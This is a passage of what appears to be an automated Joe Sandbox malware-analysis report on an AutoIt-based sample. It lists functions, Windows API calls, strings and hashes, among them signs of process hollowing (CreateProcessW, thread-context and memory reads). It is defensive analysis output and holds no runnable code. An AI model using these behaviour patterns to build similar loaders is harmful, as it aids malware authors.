                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: ae21110bd7217d307b52b4442e9c16c7dcf432587ee5502d86b7421137f5d5a2
                                                          • Instruction ID: 2864bb10bb4c55f5339a60f80831a3b51addff08c921b74c00aa6b15f9fe443f
                                                          • Opcode Fuzzy Hash: ae21110bd7217d307b52b4442e9c16c7dcf432587ee5502d86b7421137f5d5a2
                                                          • Instruction Fuzzy Hash: 88F03A706407907FEA315723AC18E7B2E7DD7C6F51F00407AB908E21B1C2A55841CFB8

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1467 1317de0-1317f66 call 1315a30 call 1317cd0 CreateFileW 1474 1317f68 1467->1474 1475 1317f6d-1317f7d 1467->1475 1476 1318020-1318025 1474->1476 1478 1317f84-1317f9e VirtualAlloc 1475->1478 1479 1317f7f 1475->1479 1480 1317fa0 1478->1480 1481 1317fa2-1317fbc ReadFile 1478->1481 1479->1476 1480->1476 1482 1317fc0-1317ffa call 1317d10 call 1316cd0 1481->1482 1483 1317fbe 1481->1483 1488 1318016-131801e ExitProcess 1482->1488 1489 1317ffc-1318011 call 1317d60 1482->1489 1483->1476 1488->1476 1489->1488
                                                          APIs
                                                            • Part of subcall function 01317CD0: Sleep.KERNELBASE(000001F4), ref: 01317CE1
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01317F59
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394800227.0000000001315000.00000040.00000020.00020000.00000000.sdmp, Offset: 01315000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1315000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CreateFileSleep
                                                          • String ID: 8KFO2MZ8MKTGF31C9FS8JD6VB1U6O
                                                          • API String ID: 2694422964-1426172293
                                                          • Opcode ID: dce0d8b79906e7d28a2ecef5222aaed4395941c05b45cc04674120c331ace1e9
                                                          • Instruction ID: a8c9022515cd73f02bff38a72e0870379bd926358c38bbfce1a98174dede7027
                                                          • Opcode Fuzzy Hash: dce0d8b79906e7d28a2ecef5222aaed4395941c05b45cc04674120c331ace1e9
                                                          • Instruction Fuzzy Hash: B9718630D0438DDAEF15D7E8C8447EEBB75AF19704F044199E248BB2C1D7BA0A49CB66

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1491 39407c-394092 1492 394098-3940ad call 397a16 1491->1492 1493 39416f-394173 1491->1493 1496 3cd3c8-3cd3d7 LoadStringW 1492->1496 1497 3940b3-3940d3 call 397bcc 1492->1497 1500 3cd3e2-3cd3fa call 397b2e call 396fe3 1496->1500 1497->1500 1501 3940d9-3940dd 1497->1501 1510 3940ed-39416a call 3b2de0 call 39454e call 3b2dbc Shell_NotifyIconW call 395904 1500->1510 1513 3cd400-3cd41e call 397cab call 396fe3 call 397cab 1500->1513 1503 3940e3-3940e8 call 397b2e 1501->1503 1504 394174-39417d call 398047 1501->1504 1503->1510 1504->1510 1510->1493 1513->1510
                                                          APIs
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003CD3D7
                                                            • Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06
                                                          • _memset.LIBCMT ref: 003940FC
                                                          • _wcscpy.LIBCMT ref: 00394150
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00394160
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                          • String ID: Line:
                                                          • API String ID: 3942752672-1585850449
                                                          • Opcode ID: c90294875cdb301d5cc816724457fcfbf7c6de1ba9bfcc17d109b3d629f2bd62
                                                          • Instruction ID: 171a92fb2d2a033e3d069c408e5c899610a3d85064de7b40f702714d0836fc63
                                                          • Opcode Fuzzy Hash: c90294875cdb301d5cc816724457fcfbf7c6de1ba9bfcc17d109b3d629f2bd62
                                                          • Instruction Fuzzy Hash: D631D371008704AFDB22EB60DC46FEB77DCAF54304F10462EF585961E2EB70A649CB8A
                                                          APIs
                                                            • Part of subcall function 00394DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00394E0F
                                                          • _free.LIBCMT ref: 003CE263
                                                          • _free.LIBCMT ref: 003CE2AA
                                                            • Part of subcall function 00396A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00396BAD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                          • API String ID: 2861923089-1757145024
                                                          • Opcode ID: a334791cabc0196f3bb097d48a37451095e9465e213e6379f2884842ec92fc81
                                                          • Instruction ID: ea0570ff442a880d0978624d90551eb9ce09a6bac9a588a92dbfcf7aefd67c58
                                                          • Opcode Fuzzy Hash: a334791cabc0196f3bb097d48a37451095e9465e213e6379f2884842ec92fc81
                                                          • Instruction Fuzzy Hash: DC917E71914229AFCF06EFA4CC81AEDB7B8FF04314B14452EE815EB2A1DB74AD45CB90
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003935A1,SwapMouseButtons,00000004,?), ref: 003935D4
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003935A1,SwapMouseButtons,00000004,?,?,?,?,00392754), ref: 003935F5
                                                          • RegCloseKey.KERNELBASE(00000000,?,?,003935A1,SwapMouseButtons,00000004,?,?,?,?,00392754), ref: 00393617
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: 5c3bb579e18ca60705394e028a0eab3232e8d3586e67e3fa7d8db75a2b90d56e
                                                          • Instruction ID: c174bf8875e05727d1d1f928d56d6f13fca1fbc44575cbdcd0607b21129ccda1
                                                          • Opcode Fuzzy Hash: 5c3bb579e18ca60705394e028a0eab3232e8d3586e67e3fa7d8db75a2b90d56e
                                                          • Instruction Fuzzy Hash: 201133B1614208BADF228FA8D880AEBBBA8EF04740F018469E805D7210E2719E459BA4
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 0131748B
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01317521
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01317543
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394800227.0000000001315000.00000040.00000020.00020000.00000000.sdmp, Offset: 01315000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1315000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
                                                          • Instruction ID: 928d03d2d3a131514a16a817bb6a5971d5d8583c27a7fa468c7a481a76d14b98
                                                          • Opcode Fuzzy Hash: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
                                                          • Instruction Fuzzy Hash: AD623C30A14258DBEB24CFA4C840BEEB776EF58304F1091A9D20DEB394E7759E81CB59
                                                          APIs
                                                            • Part of subcall function 00394EE5: _fseek.LIBCMT ref: 00394EFD
                                                            • Part of subcall function 003F9734: _wcscmp.LIBCMT ref: 003F9824
                                                            • Part of subcall function 003F9734: _wcscmp.LIBCMT ref: 003F9837
                                                          • _free.LIBCMT ref: 003F96A2
                                                          • _free.LIBCMT ref: 003F96A9
                                                          • _free.LIBCMT ref: 003F9714
                                                            • Part of subcall function 003B2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,003B9A24), ref: 003B2D69
                                                            • Part of subcall function 003B2D55: GetLastError.KERNEL32(00000000,?,003B9A24), ref: 003B2D7B
                                                          • _free.LIBCMT ref: 003F971C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                          • String ID:
                                                          • API String ID: 1552873950-0
                                                          • Opcode ID: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
                                                          • Instruction ID: 99557f0ea5890910b91b19a3b91b2a27c96d4de0a46e65b5d003f02ba491ef2b
                                                          • Opcode Fuzzy Hash: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
                                                          • Instruction Fuzzy Hash: 1F5161B1D14218AFDF259F64CC81BAEBBB9EF48304F10059EF209A7251DB715A81CF58
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                          • String ID:
                                                          • API String ID: 2782032738-0
                                                          • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                          • Instruction ID: b2f0b7c145cee66cdc440e634ef7d1a939420357d88debe5041493b8e86a8c35
                                                          • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                          • Instruction Fuzzy Hash: 6D41F934B007459BDB1ACF69C8819EE77A5EF41358B10813DE665C7E42EB31DD41CB48
                                                          APIs
                                                          • _memset.LIBCMT ref: 003944CF
                                                            • Part of subcall function 0039407C: _memset.LIBCMT ref: 003940FC
                                                            • Part of subcall function 0039407C: _wcscpy.LIBCMT ref: 00394150
                                                            • Part of subcall function 0039407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00394160
                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00394524
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00394533
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003CD4B9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                          • String ID:
                                                          • API String ID: 1378193009-0
                                                          • Opcode ID: d8089464de548547d5fa740cfdc9d263ca8c7f6fbe28cfc0d09ab0fd1fe3eedd
                                                          • Instruction ID: 3327a86c1e2f7a49431562c44b87e8da24e71cff3a9d861494e1fab58f00b153
                                                          • Opcode Fuzzy Hash: d8089464de548547d5fa740cfdc9d263ca8c7f6fbe28cfc0d09ab0fd1fe3eedd
                                                          • Instruction Fuzzy Hash: 7721F5705047849FEB338B649855FE6BBEC9B02304F0400ADF79E96182C7746D85CB45
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: AU3!P/B$EA06
                                                          • API String ID: 4104443479-416847823
                                                          • Opcode ID: d5c7ff36a4ce7ce6fedecba81b1ca77fc8433dc8dbf056eb88eef1ade08c5dc7
                                                          • Instruction ID: 116ce91a25f885231a3abbd84ec39432a80ecb13d7ec474d2b89d3f699ee39a1
                                                          • Opcode Fuzzy Hash: d5c7ff36a4ce7ce6fedecba81b1ca77fc8433dc8dbf056eb88eef1ade08c5dc7
                                                          • Instruction Fuzzy Hash: FF418B36A042586BDF279B648861FBF7FB6DB45300F284475FC82DF283D6209D4687A1
                                                          APIs
                                                          • _memset.LIBCMT ref: 003CEA39
                                                          • GetOpenFileNameW.COMDLG32(?), ref: 003CEA83
                                                            • Part of subcall function 00394750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00394743,?,?,003937AE,?), ref: 00394770
                                                            • Part of subcall function 003B0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003B07B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                          • String ID: X
                                                          • API String ID: 3777226403-3081909835
                                                          • Opcode ID: 7dfa803190601eb8281442fe156789fc0e2208086be3e3e2c2f7e8bc1347f953
                                                          • Instruction ID: dd50fe46fbaab129f946965f5fa453828dfbbfca4ad946ecdba144b2969c5309
                                                          • Opcode Fuzzy Hash: 7dfa803190601eb8281442fe156789fc0e2208086be3e3e2c2f7e8bc1347f953
                                                          • Instruction Fuzzy Hash: 4721C331A102489FDF02DF94C845BEE7BF8AF49714F00805AE548EB281DBB459898FA1
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 003F98F8
                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003F990F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Temp$FileNamePath
                                                          • String ID: aut
                                                          • API String ID: 3285503233-3010740371
                                                          • Opcode ID: bcccf775941b89df96c89e72af3ef50779b7a97bf3256913accafa2b939b30c8
                                                          • Instruction ID: 8c61c743f8c6c917a22caf0afccf41eab18865fda0406b21b091addd2152aec2
                                                          • Opcode Fuzzy Hash: bcccf775941b89df96c89e72af3ef50779b7a97bf3256913accafa2b939b30c8
                                                          • Instruction Fuzzy Hash: 70D05E7954030DABDB50ABA0DC0EFDA777CE704700F0042F1BA54920A1EAB5A5998B99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5cf3799bebf1cfb0ab154d538136b232bd7b7c9936c8efafb64ea0e5c2869938
                                                          • Instruction ID: 26f4fc6ec150895645cd089b49fb1772e27e1ee2f8e433585a67ae3e500db79e
                                                          • Opcode Fuzzy Hash: 5cf3799bebf1cfb0ab154d538136b232bd7b7c9936c8efafb64ea0e5c2869938
                                                          • Instruction Fuzzy Hash: 26F11471608301DFCB14DF29C480A6ABBE5BF89314F148A2EF8999B391D734E945CF86
                                                          APIs
                                                          • _memset.LIBCMT ref: 00394370
                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00394415
                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00394432
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_$_memset
                                                          • String ID:
                                                          • API String ID: 1505330794-0
                                                          • Opcode ID: 6898139f7bbd80a785e3d487a9791110a5a31b63b42ac02ca582208449b4b139
                                                          • Instruction ID: 69ebc998692d0849201b7d6573bdb7f1806ea5c4bec3fd50e3f876b0db543038
                                                          • Opcode Fuzzy Hash: 6898139f7bbd80a785e3d487a9791110a5a31b63b42ac02ca582208449b4b139
                                                          • Instruction Fuzzy Hash: F43191B0504701DFDB22DF34D884AABBBF8FB58309F00093EF69A86251E770A945CB56
                                                          APIs
                                                          • __FF_MSGBANNER.LIBCMT ref: 003B5733
                                                            • Part of subcall function 003BA16B: __NMSG_WRITE.LIBCMT ref: 003BA192
                                                            • Part of subcall function 003BA16B: __NMSG_WRITE.LIBCMT ref: 003BA19C
                                                          • __NMSG_WRITE.LIBCMT ref: 003B573A
                                                            • Part of subcall function 003BA1C8: GetModuleFileNameW.KERNEL32(00000000,004533BA,00000104,?,00000001,00000000), ref: 003BA25A
                                                            • Part of subcall function 003BA1C8: ___crtMessageBoxW.LIBCMT ref: 003BA308
                                                            • Part of subcall function 003B309F: ___crtCorExitProcess.LIBCMT ref: 003B30A5
                                                            • Part of subcall function 003B309F: ExitProcess.KERNEL32 ref: 003B30AE
                                                            • Part of subcall function 003B8B28: __getptd_noexit.LIBCMT ref: 003B8B28
                                                          • RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,?,?,?,003B0DD3,?), ref: 003B575F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 1372826849-0
                                                          • Opcode ID: 77a954a81b0c30d5b21dbfa849476c5e8a211b02ef55b903be144ad5b0302d18
                                                          • Instruction ID: 2334360cdcf8868cded56e29adb6697e26f865b82165c1522278b45e69ea1ef2
                                                          • Opcode Fuzzy Hash: 77a954a81b0c30d5b21dbfa849476c5e8a211b02ef55b903be144ad5b0302d18
                                                          • Instruction Fuzzy Hash: 4901CC75700B11EAD6136B79AC83BEE778C8B8236AF110535F7099E982DEB0D8008664
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003F9548,?,?,?,?,?,00000004), ref: 003F98BB
                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003F9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003F98D1
                                                          • CloseHandle.KERNEL32(00000000,?,003F9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003F98D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleTime
                                                          • String ID:
                                                          • API String ID: 3397143404-0
                                                          • Opcode ID: ee08c11b1e57696803210091c82f390f39e64f53e6a255d8728545993fd5c749
                                                          • Instruction ID: cc06500fd336c2be8e550f338a0ed2a8221c75c9cab7eb4d43fe0203001537d5
                                                          • Opcode Fuzzy Hash: ee08c11b1e57696803210091c82f390f39e64f53e6a255d8728545993fd5c749
                                                          • Instruction Fuzzy Hash: E9E08632180618B7D7221B54EC09FDA7B19AB06760F108231FB24690E0C7B12916979C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CALL
                                                          • API String ID: 0-4196123274
                                                          • Opcode ID: 29e1cf0c932a59f9ea6d8f262291fd74b12bb258c30b137d68b1fe05987b7b40
                                                          • Instruction ID: 93c127d8b6997129bb30ecc819aa159ba729cd4ba15cd60763785d434c93db00
                                                          • Opcode Fuzzy Hash: 29e1cf0c932a59f9ea6d8f262291fd74b12bb258c30b137d68b1fe05987b7b40
                                                          • Instruction Fuzzy Hash: 3B225770508600DFDB2ADF14C494B6AB7E1FF85304F158A6EE88A8B762D731EC45CB82
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
